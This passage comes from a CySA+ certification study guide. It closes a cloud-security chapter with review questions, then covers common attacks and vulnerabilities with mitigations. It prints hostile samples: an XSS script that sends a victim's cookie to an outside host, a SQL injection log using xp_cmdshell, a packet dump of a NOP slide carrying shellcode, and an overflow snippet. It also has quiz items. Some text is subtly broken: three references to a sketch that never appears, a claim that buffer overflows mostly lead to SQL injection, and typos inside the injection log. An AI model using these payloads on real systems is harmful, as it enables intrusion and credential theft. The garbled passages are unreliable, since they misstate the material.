organization visibility into the cloud system in which their data
is held.
Inability to Access
One of the issues with using standard logging and monitoring tools in a cloud environment is the inability to access the environment in a way that provides real visibility into it. In some cases, the vendor will resist allowing access to its environment. The time to demand such access is while the SLA is being negotiated.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 6-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 6-2 Key Topics in Chapter 6

Key Topic Element | Description | Page Number
Bulleted list | Cloud deployment models | 126
Bulleted list | Cloud service models | 127
Bulleted list | Advantages of FaaS | 129
Bulleted list | Top security issues with serverless computing | 129
Bulleted list | Advantages of IaC | 130
Bulleted list | Security issues with Infrastructure as Code (IaC) | 130
Bulleted list | Guidelines for providing API security | 131
Bulleted list | Designing the key management process | 132
Bulleted list | Types of audits that should be performed on key management systems | 133
Bulleted list | Security issues with cloud storage | 134
Bulleted list | Capabilities with private and public clouds | 135
Bulleted list | Issues with big data | 136
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
Software as a Service (SaaS)
Platform as a Service (PaaS)
Infrastructure as a Service (IaaS)
public cloud
private cloud
community cloud
hybrid cloud
Function as a Service (FaaS)
Infrastructure as Code (IaC)
Data Protection API (DPAPI)
NIST SP 800-57 Rev. 5
key escrow
key stretching
big data
REVIEW QUESTIONS
1. With ______________, the vendor provides the entire
solution, including the operating system, the infrastructure
software, and the application.
2. Match the terms on the left with their definitions on the
right.
Terms | Definitions
FaaS | Manages and provisions computer data centers through machine-readable definition files.
IaC | The vendor provides the hardware platform or data center, and the customer installs and manages its own operating systems and application systems.
PaaS | The vendor provides the hardware platform or data center and the software running on the platform, including the operating systems and infrastructure software.
IaaS | Completely abstracts the virtual server from the developers.
3. List at least one advantage of IaC.
4. ___________________ tend to be the most exposed
parts of a cloud system because they’re usually accessible
from the open Internet.
5. APIs are used in the ___________________ so that
devices can speak to each other without users even knowing
the APIs are there.
6. List at least one of the security issues with serverless
computing in the cloud.
7. Match the key state on the left with its definition on the
right.
Terms | Definitions
Preactivation state | Temporarily inactive
Suspended state | Keys may be used to cryptographically protect information
Deactivated state | Discovered by an unauthorized entity
Active state | Key has been generated but has not been authorized for use
Compromised state | Keys are not used to apply cryptographic protection, but in some cases, they may be used to process cryptographically protected information
8. In the _______________ phase of a key, the keying
material is not yet available for normal cryptographic
operations.
9. List at least one security issue with cloud storage.
10. ________________ is a term for sets of data so large or
complex that they cannot be analyzed by using traditional
data processing applications.
Chapter 7
Implementing Controls to
Mitigate Attacks and
Software Vulnerabilities
This chapter covers the following topics related to Objective 1.7
(Given a scenario, implement controls to mitigate attacks and
software vulnerabilities) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
Attack types: Describes XML attacks, SQL injection, overflow
attacks, remote code execution, directory traversal, privilege
escalation, password spraying, credential stuffing, impersonation,
man-in-the-middle attacks, session hijacking, rootkit, and cross-site
scripting.
Vulnerabilities: Covers improper error handling, dereferencing,
insecure object reference, race condition, broken authentication,
sensitive data exposure, insecure components, insufficient logging
and monitoring, weak or default configurations, and use of insecure
functions.
When vulnerabilities have been identified and possible attacks
have been anticipated, controls are used to mitigate or address
them. In some cases these controls can eliminate a
vulnerability, but in many cases they can only lessen the
likelihood or the impact of an attack. This chapter discusses the
various types of controls and how they can be used.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these four self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 7-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 7-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Attack Types
1, 2
Vulnerabilities
3, 4
1. Which of the following is a good solution when disparate
applications that use their own authorization logic are in use
in the enterprise?
1. XML
2. XACML
3. PDP
4. PEP
2. Which of the following attacks can result in reading
sensitive data from the database, modifying database data,
and executing administrative operations on the database?
1. SQL injection
2. STUXNET
3. Integer overflow
4. TAXII
3. Which of the following has taken place when a pointer with
a value of NULL is used as though it pointed to a valid
memory area?
1. Insecure object reference
2. Improper error handing
3. Dereferencing
4. Advanced persistent threats
4. Which of the following is a type of race condition?
1. Time-of-check/time-of-use
2. NOP sled
3. Dereferencing
4. Overflow
FOUNDATION TOPICS
ATTACK TYPES
In this section we are going to look at the sort of things that
keep network and software security experts up at night. We’ll
look at specific network and software attack methods that you must understand to be able to defend against them. Then in the
following section, we’ll talk about vulnerabilities, which are
characteristics of the network and software environment in
which we operate.
Extensible Markup Language (XML) Attack
Extensible Markup Language (XML) is the most widely used
web language now and has come under some criticism. The
method currently used to sign data to verify its authenticity has
been described as inadequate by some critics, and other criticisms have been directed at the architecture of XML security in general.
One type of Extensible Markup Language (XML) attack
targets the application that parses or reads and interprets the
XML. If the XML input contains a reference to an external
entity and is processed by a weakly configured XML parser, it
can lead to the disclosure of confidential data, denial of service,
server-side request forgery, and port scanning. This is called an
XML external entity attack and is depicted in Figure 7-1.
To address XML-based attacks, eXtensible Access Control
Markup Language (XACML) has been developed as a
standard for an access control policy language using XML. Its
goal is to create an attribute-based access control (ABAC)
system that decouples the access decision from the application
or the local machine. It provides for fine-grained control of
activities based on the following criteria:
Attributes of the user requesting access (for example, all division
managers in London)
The protocol over which the request is made (for example, HTTPS)
The authentication mechanism (for example, requester must be
authenticated with a certificate)
FIGURE 7-1 XML External Entity Attack
XACML uses several distributed components, including
Policy enforcement point (PEP): This entity protects the
resource that the subject (a user or an application) is attempting to
access. When a PEP receives a request from a subject, it creates an
XACML request based on the attributes of the subject, the
requested action, the resource, and other information.
Policy decision point (PDP): This entity retrieves all applicable policies in XACML and compares the request with the policies. It transmits an answer (access or no access) back to the PEP.
XACML is valuable because it is able to function across
application types. Figure 7-2 illustrates the process flow used by
XACML.
XACML is a good solution when disparate applications that use
their own authorization logic are in use in the enterprise. By
leveraging XACML, developers can remove authorization logic
from an application and centrally manage access using policies
that can be managed or modified based on business need
without making any additional changes to the applications
themselves.
FIGURE 7-2 XACML Flow
Structured Query Language (SQL) Injection
A Structured Query Language (SQL) injection attack
inserts, or “injects,” a SQL query as the input data from the
client to the application. This type of attack can result in the
attacker being able to read sensitive data from the database,
modify database data, execute administrative operations on the
database, recover the content of a given file, and even issue
commands to the operating system.
Figure 7-3 shows how a regular user might request information
from a database attached to a web server and also how a hacker
might ask for the same information and get usernames and
passwords by changing the command. While not obvious from
the diagram in Figure 7-3, the attack is prevented by the
security rules in the form of input validation, which examines
all input for malicious characteristics.
The job of identifying SQL injection attacks in logs can be made easier by using tools such as Log Parser from Microsoft. This command-line utility, which uses SQL-like queries, can be used to search for and locate errors of a specific type. One type to look for is a 500 error (internal server error),
which often indicates a SQL injection. Example 7-1 shows an
example of a log entry. In this case, the presence of a CREATE
TABLE statement indicates a SQL injection.
FIGURE 7-3 SQL Injection
Example 7-1 Log Entry with SQL Injection Attack
GET /inventory/Scripts/ProductList.asp
showdetails=true&idSuper=0&browser=pt%showprods&Type=588
idCategory=60&idProduct=66;CREATE%20TABLE%20[X_6624]
([id]%20int%20
NOT%20NULL%20
IDENTITY%20
(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL;
Insert%20into&20[X_6858] (ResultTxt)
%20exec%20master.dbo.xp_
cmdshell11%20'Dir%20D: \';
Insert%20into&20[X_6858]%20values%20('g_over');
exec%20master.dbo.sp_dropextendedeproc%20'xp_cmdshell'
300
The following measures can help you prevent these types of
attacks:
Use proper input validation.
Use blacklisting or whitelisting of special characters.
Use parameterized queries in ASP.NET and prepared statements in Java to perform escaping of dangerous characters before the SQL statement is passed to the database (see the sketch after this list).
Overflow Attacks
An overflow occurs when an area of memory of some sort is full
and can hold no more information. Any information that
overflows is lost. Overflowing these memory areas is one of the
ways hackers get systems to perform operations they aren’t
supposed to perform (at least not at that time or under those
circumstances). In some cases these overflows are caused to
permit typically impermissible actions. There are a number of
different types of overflow attacks. They differ mainly in the
type of memory under attack.
Buffer
A buffer is typically an area of memory that is used to transfer
data from one location to another. In some cases, a buffer is
used to hold data from the disk while data-manipulating
operations are performed. A buffer overflow is an attack that
occurs when the amount of data that is submitted is larger than
the buffer can handle. Typically, this type of attack is possible
because of poorly written application or operating system code.
This can result in the injection of malicious code, most commonly leading either to a denial-of-service (DoS) condition or to a SQL injection.
To protect against this issue, organizations should ensure that
all operating systems and applications are updated with the
latest updates, service packs, and patches. In addition,
programmers should properly test all applications to check for
overflow conditions.
A hacker can take advantage of this phenomenon by submitting
too much data, which can cause an error or, in some cases,
enable the hacker to execute commands on the device if the
hacker can locate an area where commands can be executed.
Not all attacks are designed to execute commands. An attack
may just lock up the system, as in a DoS attack.
A packet containing a long string of no-operation (NOP)
instructions followed by a command usually indicates a type of
buffer overflow attack called a NOP slide. The purpose of this
type of attack is to get the CPU to locate where a command can
be executed. Example 7-2 shows a packet containing a long
string of NOP instructions, as seen by a sniffer.
Example 7-2 Packet with NOP Slide, As Seen by a Sniffer
TCP Connection Request
---- 14/03/2019 15:40:57.910
68.144.193.124 : 4560 TCP Connected ID = 1
---- 14/03/2019 15:40:57.910
Status Code: 0 OK
68.144.193.124 : 4560 TCP Data In Length 697 bytes
MD5 = 19323C2EA6F5FCEE2382690100455C17
---- 14/03/2019 15:40:57.920
0000  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0010  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0020  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0030  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0040  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0050  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0060  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0070  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0080  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0090  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00A0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00B0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00C0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00D0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00E0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00F0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0100  90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77  ............M?.w
0110  90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90  .....cd.........
0120  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
0130  90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9  ..........ZJ3.f.
0140  66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70  f..4...........p
0150  99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34  .....!.id......4
0160  12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12  ....A....j....j.
0170  E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62  ...b....t......b
0180  12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B  .k...j?.....^..{
0190  70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA  p....T....ZHx.X.
01A0  50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99  P.......ZXx..X..
01B0  9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5  .Z.c.n._..I...q.
01C0  99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D  ...._...f.e..A..
01D0  C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE  .q............f.
01E0  69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89  i.A^....$.Y.....
01F0  CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE  ..f.m...f.a...f.
0200  65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62  e.u..m.B......{b
0210  10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99  .........^......
0220  14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA  ............^...
0230  F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA  ........f.}.f.q.
0240  59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B  Y5.Y.`....fK..2{
0250  77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA  w.YZqbgff.......
0260  D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB  ................
0270  F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC  ................
0280  EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99  ................
0290  EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED  ................
02A0  D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA  ................
Notice the long string of 90s in the middle of the packet; this
string pads the packet and causes it to overrun the buffer.
Example 7-3 shows another buffer overflow attack.
Example 7-3 Buffer Overflow Attack
#include <string.h>

char *code = "AAAABBBBCCCCDDD"; // including the terminating '\0', size = 16 bytes

void main()
{
    char buf[8];
    strcpy(buf, code); // copies 16 bytes into an 8-byte buffer
}
In this example, 16 characters are being sent to a buffer that
holds only 8 bytes. With proper input validation, a buffer
overflow attack causes an access violation. Without proper input
validation, the allocated space is exceeded, and the data at the
bottom of the memory stack is overwritten. The key to
preventing many buffer overflow attacks is input validation, in
which any input is checked for format and length before it is
used. Buffer overflows and boundary errors (when input
exceeds the boundaries allotted for the input) are a family of
error conditions called input validation errors.
Integer Overflow
Integer overflow occurs when math operations try to create a
numeric value that is too large for the available space. The
register width of a processor determines the range of values that
can be represented. Moreover, a program may assume that a
variable always contains a positive value. If the variable has a
signed integer type, an overflow can cause its value to wrap and
become negative. This may lead to unintended behavior.
Similarly, subtracting from a small unsigned value may cause it
to wrap to a large positive value, which may also be an
unexpected behavior.
You can mitigate integer overflow attacks by doing the
following:
Use strict input validation.
Use a language or compiler that performs automatic bounds checks (see the sketch after this list).
Choose an integer type that contains all possible values of a
calculation. This reduces the need for integer type casting (changing
an entity of one data type into another), which is a major source of
defects.
Heap
A heap is an area of memory that can be increased or decreased in size. It sits below the memory-mapped region for shared libraries and is used for dynamic memory allocation. Overflows that
occur in this area are called heap overflows. An example of
an overflow into the heap area is shown in Figure 7-4.
Figure 7-4 Heap Overflow
Remote Code Execution
Remote code execution attacks comprise a category of attack
types distinguished by the ability of the hacker to get the local
system (user system) to execute code that resides on another
machine, which could be located anywhere in the world. In
some cases the remote code has been embedded in a website the
user visits. In other cases the code may be injected into the
user’s browser. The key element is that the code came from the
hacker and is executed or injected from a remote location. A
specific form of this attack is shown in Figure 7-5, in which the
target is the local DNS server.
FIGURE 7-5 Remote Code Execution
Directory Traversal
Like any other server, web servers have a folder structure. When
users access web pages, the content is found in parts of the
structure that are the only parts designed to be accessible by a
web user. One of the ways malicious individuals are able to
access parts of the directory to which they should not have
access is through a process called directory traversal. If they
are able to break out of the web root folder, they can access
restricted directories and execute commands outside of the web
server’s root directory.
In Figure 7-6, the hacker has been able to access a subfolder of
the root, System32. This is where the password files are found.
This, if allowed by the system, is done by using the ../ technique
to back up from the root to the System32 folder.
Figure 7-6 Directory Traversal
Preventing directory traversal is accomplished by filtering the
user’s input and removing metacharacters.
Privilege Escalation
Privilege escalation is the process of exploiting a bug or
weakness in an operating system to allow a user to receive
privileges to which she is not entitled. These privileges can be
used to delete files, view private information, or install
unwanted programs, such as viruses. There are two types of
privilege escalation:
Vertical privilege escalation: This occurs when a lower-privilege user or application accesses functions or content reserved for higher-privilege users or applications.
Horizontal privilege escalation: This occurs when a normal
user accesses functions or content reserved for other normal users.
The following measures can help prevent privilege escalation:
Ensure that databases and related systems and applications are
operating with the minimum privileges necessary to function.
Verify that users are given the minimum access required to do their
job.
Ensure that databases do not run with root, administrator, or other
privileged account permissions, if possible.
Password Spraying
Password spraying is a technique used to identify the
passwords of domain users. Rather than targeting a single
account as in a brute-force attack, password spraying targets, or
“sprays,” multiple accounts with the same password attempt.
Because account lockouts are based on attempts per account,
this technique enables the attacker to attempt a password
against many accounts at once without locking out any of the
accounts. When performed in a controlled manner (remaining conscious of the time period since the last attempt against an account and waiting until the timer starts over before another attempt), an attacker can basically perform a brute-force attack without locking out accounts. Figure 7-7 shows the process.
Credential Stuffing
Another form of brute-force attack is credential stuffing. In
this case, the malicious individuals have obtained a password
file and need to match the passwords with the proper accounts.
Large numbers of captured (spilled) credentials are automatically entered into websites until they are potentially matched to an existing account, which the attackers can then hijack for their own purposes. This process is usually automated
in some way, as shown in Figure 7-8.
Figure 7-7 Password Spraying
Figure 7-8 Credential Stuffing
To prevent credential stuffing:
Implement multifactor authentication.
Regularly check compromised-credentials lists and require password resets for any users who appear on a list (see the sketch after this list).
Require periodic password resets for all users.
Enable CAPTCHAs (challenge–response tests to determine whether the user is human).
Impersonation
Impersonation occurs when one user assumes the identity of
another by acquiring the logon credentials associated with the
account. This typically occurs through exposure of the
credentials either through social engineering (shoulder surfing,
help desk intimidation, etc.) or by sniffing unencrypted
credentials in transit. The best approach to preventing
impersonation is user education, because many of these attacks
rely on the user committing some insecure activity.
Man-in-the-Middle Attack
A man-in-the-middle attack intercepts legitimate traffic
between two entities. The attacker can then control information
flow and eliminate or alter the communication between the two
parties. Types of man-in-the-middle attacks include
ARP spoofing: The attacker poisons the ARP cache on a switch by
answering ARP requests for another computer’s IP address with his
own MAC address. After the ARP cache has been successfully
poisoned, when ARP resolution occurs, both computers have the
attacker’s MAC address listed as the MAC address that maps to the
other computer’s IP address. As a result, both are sending to the
attacker, placing him “in the middle.” Two mitigation techniques
are available for preventing ARP poisoning on a Cisco switch:
Dynamic ARP Inspection (DAI): This security feature
intercepts all ARP requests and responses and compares each
response’s MAC address and IP address information against the
MAC–IP bindings contained in a trusted binding table. This
table is built by also monitoring all DHCP requests for IP
addresses and maintaining the mapping of each resulting IP
address to a MAC address (which is a part of DHCP snooping). If
an incorrect mapping is attempted, the switch rejects the packet.
DHCP snooping: The main purpose of DHCP snooping is to
prevent a poisoning attack on the DHCP database. This is not a
switch attack per se, but one of its features can support DAI. It
creates a mapping of IP addresses to MAC addresses from a
trusted DHCP server that can be used in the validation process of
DAI.
You must implement both DAI and DHCP snooping because DAI
depends on DHCP snooping.
MAC overflow: Preventing security issues with switches involves
preventing MAC address overflow attacks. By design, switches place
each port in its own collision domain, which is why a sniffer
connected to a single port on a switch can only capture the traffic on
that port and not traffic on other ports. However, an attack called a
MAC address overflow attack can cause a switch to fill its MAC
address table with nonexistent MAC addresses. Using free tools, a
hacker can send thousands of nonexistent MAC addresses to the
switch. The switch can dedicate only a certain amount of memory
for the table, and at some point, it fills with the bogus MAC
addresses. This prevents valid devices from creating content-addressable memory (CAM) entries (MAC addresses) in the MAC address table. When this occurs, all legitimate traffic received by the
switch is flooded out every port. Remember that this is what
switches do when they don’t find a MAC address in the table. A
hacker can capture all the traffic. Figure 7-9 shows how this type of
attack works.
Figure 7-9 MAC Overflow Attack
VLAN-based Attacks
Enterprise-level switches are capable of creating virtual local-area networks (VLANs). These are logical subdivisions of a
switch that segregate ports from one another as if they were in
different LANs. VLANs can also span multiple switches,
meaning that devices connected to switches in different parts of
a network can be placed in the same VLAN, regardless of
physical location. A VLAN adds a layer of separation between
sensitive devices and the rest of the network. For example, if
only two devices should be able to connect to the HR server, the
two devices and the HR server could be placed in a VLAN
separate from the other VLANs. Traffic between VLANs can
occur only through a router. Routers can be used to implement
access control lists (ACLs) that control the traffic allowed
between VLANs. Table 7-2 lists the advantages and
disadvantages of deploying VLANs.
Table 7-2 Advantages and Disadvantages of VLANs

Advantages | Disadvantages
Flexibility: Removes the requirement that devices in the same LAN (or, in this case, VLAN) be in the same location. | Managerial overhead is required to secure VLANs.
Performance: Creating smaller broadcast domains (each VLAN is a broadcast domain) improves performance. | Misconfigurations can isolate devices.
Security: Provides more separation at Layers 2 and 3. | The limit on the number of VLANs may cause issues on a very large network.
Cost: Switched networks with VLANs are less costly than routed networks because routers cost more than switches. | Subnet-based VLANs may expose traffic to potential sniffing and man-in-the-middle attacks when traffic goes through third-party ATM clouds or the Internet.
As you can see, the benefits of deploying VLANs far outweigh
the disadvantages, but there are some VLAN attacks of which
you should be aware. In particular, you need to watch out for
VLAN hopping. By default, a switch port is an access port,
which means it can only be a member of a single VLAN. Ports
that are configured to carry the traffic of multiple VLANs, called
trunk ports, are used to carry traffic between switches and to
routers. An aim of a VLAN hopping attack is to receive traffic
from a VLAN of which the hacker's port is not a member. It can be done in two ways:
Switch spoofing: Switch ports can be set to use a negotiation
protocol called Dynamic Trunking Protocol (DTP) to negotiate the
formation of a trunk link. If an access port is left configured to use
DTP, it is possible for a hacker to set his interface to spoof a switch
and use DTP to create a trunk link. If this occurs, the hacker can
capture traffic from all VLANs. Figure 7-10 shows this process. To
prevent this, you should disable DTP on all switch ports.
Figure 7-10 Switch Spoofing
A switch port can be configured with the following possible settings:
Trunk (hard-coded to be a trunk)
Access (hard-coded to be an access port)
Dynamic desirable (in which case the port is willing to form a
trunk and actively attempts to form a trunk)
Dynamic auto (in which case the port is willing to form a trunk
but does not initiate the process)
If a switch port is set to either dynamic desirable or dynamic auto, it
would be easy for a hacker to connect a switch to that port, set his
port to dynamic desirable, and thereby form a trunk. All switch
ports should be hard-coded to trunk or access, and DTP should not
be used. You can use the following command set to hard-code a port
on a Cisco switch as a trunk port:
Switch(config)# interface FastEthernet 0/1
Switch(config-if)# switchport mode trunk
To hard-code a port as an access port that will never become a trunk
port, thus making it impervious to a switch spoofing attack, you use
this command set:
Switch(config)# interface FastEthernet 0/1
Switch(config-if)# switchport mode access
Double tagging: Tags are used on trunk links to identify the VLAN to which each frame belongs. A second way to accomplish VLAN hopping against trunk ports is a process called double tagging. In this attack, the hacker creates a packet with two tags. The first tag is stripped off by the trunk port of
packet with two tags. The first tag is stripped off by the trunk port of
the first switch it encounters, but the second tag remains, allowing
the frame to hop to another VLAN. This process is shown in Figure
7-11. In this example, the native VLAN number between the
Company Switch A and Company Switch B switches has been
changed from the default of 1 to 10.
FIGURE 7-11 Double Tagging
To prevent this, you do the following:
Specify an unused VLAN ID as the native VLAN (by default, VLAN 1) for all trunk ports. Make sure it matches on both ends of each link. To change the native VLAN from 1 to 99, execute this command on the trunk interface:
switch(config-if)# switchport trunk native vlan 99
Move all access ports out of VLAN 1. You can do this by using the
interface range command for every port on a 12-port switch as
follows:
switch(config)# interface range FastEthernet 0/1 - 12
switch(config-if-range)# switchport access vlan 61
This example places the access ports in VLAN 61.
Place unused ports in an unused VLAN. Use the same command
you used to place all ports in a new native VLAN and specify the
VLAN number.
Session Hijacking
In a session hijacking attack, the hacker attempts to place
himself in the middle of an active conversation between two
computers for the purpose of taking over the session of one of
the two computers, thus receiving all data sent to that
computer. A couple of tools can be used for this attack.
Juggernaut and the Hunt Project allow the attacker to spy on
the TCP session between the computers. Then the attacker uses
some sort of DoS attack to remove one of the two computers
from the network while spoofing the IP address of that
computer and replacing that computer in the conversation. This
results in the hacker receiving all traffic that was originally
intended for the computer that suffered the DoS attack. Figure
7-12 shows a session highjack.
FIGURE 7-12 Session Hijacking
Rootkit
A rootkit is a set of tools that a hacker can use on a computer
after he has managed to gain access and elevate his privileges to
administrator. It gets its name from the root account, the most
powerful account in Linux-based operating systems. Rootkit
tools might include a backdoor for the hacker to access. This is
one of the hardest types of malware to remove, and in many
cases only a reformat of the hard drive will completely remove
it.
The following are some of the actions a rootkit can take:
Installing a backdoor
Removing all entries from the security log (log scrubbing)
Replacing default tools with a compromised version (Trojaned
programs)
Making malicious kernel changes
Unfortunately, the best defense against rootkits is not to get them in the first place because they are very difficult to detect
and remove. In many cases rootkit removal renders the system
useless. There are some steps you can take to prevent rootkits,
including the following:
Monitor system memory for ingress points for a process as it invokes, and keep track of any imported library calls that may be redirected to other functions.
Use the Microsoft Safety Scanner to look for information kept
hidden from the Windows API, the Master File Table, and the
directory index.
Consider products that are standalone rootkit detection tools, such
as Microsoft Safety Scanner and Malwarebytes Anti-Rootkit 2019.
Keep the firewall updated.
Harden all workstations.
Cross-Site Scripting
Cross-site scripting (XSS) occurs when an attacker locates a
website vulnerability and injects malicious code into the web
application. Many websites allow and even incorporate user
input into a web page to customize the web page. If a web
application does not properly validate this input, one of two
things could happen: the text may be rendered on the page, or a script may be executed when others visit the web page. Figure 7-13 shows a high-level view of an XSS attack.
Figure 7-13 High-Level View of a Typical XSS Attack
The following example of an XSS attack is designed to steal a
cookie from an authenticated user:
<SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT>
Proper validation of all input should be performed to prevent
this type of attack. This involves identifying all user-supplied
input and testing all output.
There are three types of XSS attacks:
Reflected XSS
Persistent XSS
Document Object Model (DOM) XSS
Let’s look at how they differ.
Reflected
In a reflected XSS attack (also called a non-persistent or Type
II attack), a web application immediately returns user input in
an error message or search result without that data being made
safe to render in the browser, and without permanently storing
the user-provided data. Figure 7-14 shows an example of how a
reflected XSS attack works.
Figure 7-14 Reflected XSS Attack
Persistent
A persistent XSS attack (also called a stored or Type I attack)
stores the user input on the target server, such as in a database,
a message forum, a visitor log, a comment field, and so forth.
A victim then retrieves the stored data from the web application without that data being made safe to render in the browser. Figure 7-15 shows an example of a persistent XSS
attack.
FIGURE 7-15 Persistent XSS Attack
Document Object Model (DOM)
With a Document Object Model (DOM) XSS attack (or
Type 0 attack), the entire tainted data flow from source to sink
(a class or function designed to receive incoming events from
another object or function) takes place in the browser. The
source of the data is in the DOM, the sink is also in the DOM,
and the data flow never leaves the browser. Figure 7-16 shows
an example of this approach.
Figure 7-16 DOM-Based XSS Attack
VULNERABILITIES
Whereas attacks are actions carried out by malicious
individuals, vulnerabilities are characteristics of the network
and software environment in which we operate. This section
describes the various software vulnerabilities that a
cybersecurity analyst should be able to identify and remediate.
Improper Error Handling
Web applications, like all other applications, suffer from errors
and exceptions, and such problems are to be expected.
However, the manner in which an application reacts to errors
and exceptions determines whether security can be
compromised. One of the issues is that an error message may
reveal information about the system that a hacker may find
useful. For this reason, when applications are developed, all
error messages describing problems should be kept as generic
as possible. Also, you can use tools such as the OWASP Zed
Attack Proxy (ZAP, introduced in Chapter 4) to try to make
applications generate errors.
Dereferencing
A null-pointer dereference takes place when a pointer with a
value of NULL is used as though it pointed to a valid memory
area. In the following code, the assumption is that “cmd” has
been defined:
String cmd = System.getProperty("cmd");
cmd = cmd.trim();
If it has not been defined, the program throws a null-pointer
exception when it attempts to call the trim() method. If an
attacker can intentionally trigger a null-pointer dereference, the
attacker might be able to use the resulting exception to bypass
security logic or to cause the application to reveal debugging
information.
Insecure Object Reference
Applications frequently use the actual name or key of an object
when generating web pages. Applications don’t always verify
that a user is authorized for the target object. This results in an
insecure object reference flaw. Such an attack on a
vulnerability can come from an authorized user, meaning that
the user has permission to use the application but is accessing
information to which she should not have access. To prevent
this problem, each direct object reference should undergo an
access check. Code review of the application with this specific
issue in mind is also recommended.
Race Condition
A race condition is a vulnerability that targets the normal
sequencing of functions. It is an attack in which the hacker
inserts himself between instructions, introduces changes, and
alters the order of execution of the instructions, thereby altering
the outcome. One type of race condition is the time-of-check/time-of-use vulnerability. In this attack, a system is changed between a
condition check and the display of the check’s results. For
example, consider the following scenario: At 10:00 a.m. a
hacker was able to obtain a valid authentication token that
allowed read/write access to the database. At 10:15 a.m. the
security administrator received alerts from the IDS about a
database administrator performing unusual transactions. At
10:25 a.m. the security administrator reset the database
administrator’s password. At 11:30 a.m. the security
administrator was still receiving alerts from the IDS about
unusual transactions from the same user. In this case, the
hacker created a race condition that disturbed the normal
process of authentication. The hacker remained logged in with
the old password and was still able to change data.
Countermeasures to these attacks are to make critical sets of instructions either execute in order and in their entirety or else roll back or prevent the changes. It is also best for the system to lock access to the items it will use while carrying out these sets of instructions.
Broken Authentication
When the authentication system is broken, it’s as if someone
has left the front door open. This can lead to a faster
compromise of vulnerabilities discussed in this section as well
as attacks covered in the previous section. Broken
authentication means that a malicious individual has either
guessed or stolen a password, enabling them to log in as the
user with all of the user’s rights. Typical methods are
Guessing a password
Cracking a captured password hash
Phishing attacks
Using social engineering such as shoulder surfing
Recall that Chapter 2, “Utilizing Threat Intelligence to Support
Organizational Security,” covered the CVSS scoring system for
vulnerabilities. As a review, the system uses a metric dedicated to Privileges Required (PR) to describe the level of privileges an attacker must possess to exploit the vulnerability.
The metric has three possible values:
H: Stands for High and means the attacker requires privileges that
provide significant (that is, administrative) control over the
vulnerable component, allowing access to component-wide settings
and files.
L: Stands for Low and means the attacker requires privileges that
provide basic user capabilities that could normally affect only
settings and files owned by a user.
N: Stands for None and means that no authentication mechanisms
are in place to stop the exploit of the vulnerability.
Sensitive Data Exposure
Sensitive data in this context includes usernames, passwords,
encryption keys, and paths that applications need to function
but that would cause harm if discovered. Determining the
proper method of securing this information is critical and not
